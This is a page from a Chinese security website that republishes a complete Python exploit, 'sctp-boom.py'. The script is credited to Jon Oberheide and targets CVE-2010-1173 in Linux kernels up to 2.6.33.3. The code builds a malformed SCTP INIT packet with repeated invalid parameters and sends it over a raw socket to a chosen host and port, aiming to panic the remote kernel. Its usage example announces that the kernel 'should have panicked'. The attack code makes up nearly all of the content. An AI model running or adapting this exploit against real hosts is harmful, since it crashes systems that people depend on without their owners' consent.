首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS
来源:http://jon.oberheide.org 作者:Oberheide 发布时间:2010-08-10  

# From: http://jon.oberheide.org/files/sctp-boom.py
#!/usr/bin/env python

'''
  sctp-boom.py
 
  Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS
  Jon Oberheide <jon@oberheide.org>
  http://jon.oberheide.org
 
  Information:
 
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173

    The sctp_process_unk_param function in net/sctp/sm_make_chunk.c in the
    Linux kernel 2.6.33.3 and earlier, when SCTP is enabled, allows remote
    attackers to cause a denial of service (system crash) via an SCTPChunkInit
    packet containing multiple invalid parameters that require a large amount
    of error data.

  Usage:
 
    $ python sctp-boom.py 1.2.3.4 19000
    [+] sending malformed SCTP INIT msg to 1.2.3.4:19000
    ...
    [+] kernel should have panicked on remote host 1.2.3.4

  Requirements:
   
    * dnet: http://libdnet.sourceforge.net/
    * dpkt: http://code.google.com/p/dpkt/

'''

import os, sys, socket

def err(txt):
    print '[-] error: %s' % txt
    sys.exit(1)

def msg(txt):
    print '[+] %s' % txt

def usage():
    print >> sys.stderr, 'usage: %s host port' % sys.argv[0]
    sys.exit(1)

try:
    import dpkt
except ImportError:
    err('requires dpkt library: http://code.google.com/p/dpkt/')

try:
    import dnet
except ImportError:
    try:
        import dumbnet as dnet
    except ImportError:
        err('requires dnet library: http://libdnet.sourceforge.net/')

def main():
    if len(sys.argv) != 3:
        usage()

    host = sys.argv[1]
    port = int(sys.argv[2])

    try:
        sock = dnet.ip()
        intf = dnet.intf()
    except OSError:
        err('requires root privileges for raw socket access')

    dst_addr = socket.gethostbyname(host)
    interface = intf.get_dst(dnet.addr(dst_addr))
    src_addr = interface['addr'].ip

    msg('sending malformed SCTP INIT msg to %s:%s' % (dst_addr, port))

    invalid = ''
    invalid += '\x20\x10\x11\x73'
    invalid += '\x00\x00\xf4\x00'
    invalid += '\x00\x05'
    invalid += '\x00\x05'
    invalid += '\x20\x10\x11\x73'

    for i in xrange(20):
        invalid += '\xc0\xff\x00\x08\xff\xff\xff\xff'

    init = dpkt.sctp.Chunk()
    init.type = dpkt.sctp.INIT
    init.data = invalid
    init.len = len(init)

    sctp = dpkt.sctp.SCTP()
    sctp.sport = 0x1173
    sctp.dport = port
    sctp.data = [ init ]

    ip = dpkt.ip.IP()
    ip.src = src_addr
    ip.dst = dnet.ip_aton(dst_addr)
    ip.p = dpkt.ip.IP_PROTO_SCTP
    ip.data = sctp
    ip.len = len(ip)

    print `ip`

    pkt = dnet.ip_checksum(str(ip))
    sock.send(pkt)

    msg('kernel should have panicked on remote host %s' % (dst_addr))

if __name__ == '__main__':
    main()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Fat Player 0.6b WAV File Proce
·ffdshow Video Codec Denial of
·Visual MP3 Splitter & Joiner 6
·Quintessential Player 5.0.121
·dBpowerAMP Audio Player 2 (Fil
·AoAAudioExtractor 2.0.0.0 Acti
·QQ Computer Manager TSKsp.sys
·Mthree Development MP3 to WAV
·Rosoft media player 4.4.4 SEH
·SopCast New 0Day Remote Exploi
·Play! Framework <= 1.0.3.1 Dir
·Secure Browser 2.0 DOS Exploit
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved